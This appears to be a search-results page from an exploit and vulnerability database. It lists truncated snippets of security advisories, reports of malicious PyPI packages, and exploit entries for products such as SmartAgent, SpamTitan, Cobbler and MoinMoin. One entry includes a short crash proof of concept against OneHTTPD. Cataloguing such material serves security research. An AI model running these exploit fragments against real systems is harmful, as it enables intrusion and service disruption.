20 matches found
USN-7762-1: pip vulnerabilities
Dennis Brinkrolf and Tobias Funke discovered that Requests incorrectly leaked Proxy-Authorization headers. A remote attacker could possibly use this issue to obtain sensitive information. This update addresses the issue in the Requests module bundled into pip in Ubuntu 22.04 LTS. CVE-2023-32681 I...
Beebeeto-framework
This is a Python framework for building and executing proof-of-concept (POC) exploits, specifically targeting the HttpFileServer (HFS) vulnerability. The framework is called Beebeeto and is maintained by the n0tr00t security team. The framework provides a set of tools and libraries for creating and...
MAL-2025-41707 Malicious code in new-requests-module (PyPI)
Malicious code in new-requests-module (PyPI)
MAL-2025-965 Malicious code in reqesst (PyPI)
Source: kam193 8e4a4682ad923d5e0f2e444487e5f42a4bae8d753ecd747f7b652e407f5cc32f Importing the module downloads and starts an infostealer attempting to exfiltrate data and establishing persistence through autorun directory. --- Category:...
SmartAgent 1.1.0 Remote Code Execution
Exploit Title: SmartAgent v1.1.0 - Unauthenticated Remote Code Execution Date: 01-10-2024 Exploit Author: Alter Prime Vendor Homepage: https://smarts-srlcom.com/, https://smartagent.com Version: Build v1.1.0 Tested on: Kali Linux An unauthenticated user can access a php script called...
Hitachi NAS SMU Backup And Restore Insecure Direct Object Reference
!/usr/bin/python3 Title: Hitachi NAS HNAS System Management Unit SMU Backup & Restore IDOR Vulnerability CVE: CVE-2023-5808 Date: 2023-12-13 Exploit Author: Arslan Masood @arszilla Vendor: https://www.hitachivantara.com/ Version: --id --sso " Create --host argument: parser.addargument "--host",...
SCM Manager 1.60 - Cross-Site Scripting Stored (Authenticated) Exploit
!/usr/bin/python3 Exploit Title: SCM Manager 1.60 - Cross-Site Scripting Stored Authenticated Google Dork: intitle:"SCM Manager" intext:1.60 Date: 05-25-2023 Exploit Author: neg0x https://github.com/n3gox/CVE-2023-33829 Vendor Homepage: https://scm-manager.org/ Software Link:...
Exploit for OS Command Injection in Netgate Pfblockerng
pfBlockerNG T...
Exploit for Cross-Site Request Forgery (CSRF) in Cisco Industrial_Network_Director
PoC exploit for CVE-2019-18818, an unauthenticated password rese...
SUSE: Security Advisory (SUSE-SU-2016:0114-1)
The remote host is missing an update for the SPDX-FileCopyrightText: 2021 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...
SpamTitan 7.07 Remote Code Execution
Exploit Title: SpamTitan 7.07 - Remote Code Execution Authenticated Date: 2020-09-18 Exploit Author: Felipe Molina @felmoltor Vendor Homepage: https://www.titanhq.com/spamtitan/spamtitangateway/ Software Link: https://www.titanhq.com/signup/?producttype=spamtitangateway Version: 7.07 Tested on:...
Open-AudIT Professional 3.3.1 Remote Code Execution
Exploit Title: Open-AudIT Professional 3.3.1 - Remote Code Execution Date: 2020-04-22 Exploit Author: Askar CVE: CVE-2020-12078 Vendor Homepage: https://opmantek.com/ Version: v3.3.1 Tested on: Ubuntu 18.04 / PHP 7.2.24 !/usr/bin/python3 import requests import sys import warnings import random...
Web-Traffic-Generator - A Quick And Dirty HTTP/S "Organic" Traffic Generator
Just a simple poorly written Python script that aimlessly "browses" the internet by starting at pre-defined rootURLs and randomly "clicking" links on pages until the pre-defined clickDepth is met. I created this as a noise generator to use for an Incident Response / Network Defense simulation. Th...
Cobbler 2.8.0 - (Authenticated) Remote Code Execution
!/usr/bin/python """ Exploit title: Cobbler 2.8.x Authenticated RCE. Author: Dolev Farhi Contact: dolevf at protonmail.com @hack6tence Date: 03-16-2017 Vendor homepage: cobbler.github.io Software version: v.2.5.160805 Software Description ===================== Cobbler is a Linux installation serv...
BackdoorMan - Toolkit That Helps You Find Malicious, Hidden And Suspicious PHP Scripts And Shells
A Python open source toolkit that helps you find malicious, hidden and suspicious PHP scripts and shells in a chosen destination, it automates the process of detecting the above. Purpose The main purpose of BackdoorMan is to help web-masters and developers to discover malicious scripts in their...
MoinMoin - Arbitrary Command Execution
No description provided by source. !/usr/bin/env python -- coding: utf-8 -- ascii = '\x1b1;31m' ascii +=' \r\n' ascii +=' ?????????? ?????? ??? ??? ??? ?????????? ???????? ??? ??????? \r\n' ascii +=' ??????????? ???????? ??? ???? ??? ??????????? ???????? ??? ??????? \r\n' ascii +=' ??? ??? ??? ??...
OneHTTPD 0.8 - Crash PoC
Exploit for windows platform in category dos / poc from requests import get,ConnectionError as cerror from sys import argv iflenargv!=2: print '%s host' % argv0 else: buff = '/'245 script,host=argv try: get'http://'+host+':8080/'+buff except cerror: exit1 0day.today 2018-04-02...
MoinMoin - Arbitrary Command Execution
!/usr/bin/env python -- coding: utf-8 -- ascii = '\x1b1;31m' ascii +=' \r\n' ascii +=' ██████████ ██████ ███ ███ ███ ██████████ ████████ ███ ███████ \r\n' ascii +=' ███████████ ████████ ███ ████ ███ ███████████ ████████ ███ ███████ \r\n' ascii +=' ██▒ ██▒ ██▒ ██▒ ███ ██▒ ██▒█▒███ ██▒ ██▒ ██▒ ██▒...
MoinMoin - Arbitrary Command Execution
MoinMoin - Arbitrary Command Execution !/usr/bin/env python -- coding: utf-8 -- ascii = '\x1b1;31m' ascii +=' \r\n' ascii +=' ██████████ ██████ ███ ███ ███ ██████████ ████████ ███ ███████ \r\n' ascii +=' ███████████ ████████ ███ ████ ███ ███████████ ████████ ███ ███████ \r\n' ascii +=' ██▒ ██▒ ██...